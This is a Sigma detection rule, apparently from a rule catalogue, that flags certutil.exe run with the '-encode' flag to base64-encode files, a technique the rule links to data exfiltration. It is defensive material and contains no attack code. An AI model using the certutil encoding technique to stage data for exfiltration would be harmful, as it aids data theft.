Techniques
Sample rules
File Encoded To Base64 Via Certutil.EXE
- source: sigma
- technicques:
- t1027
Description
Detects the execution of certutil with the “encode” flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|windash: -encode
selection_img:
- Image|endswith: \certutil.exe
- OriginalFileName: CertUtil.exe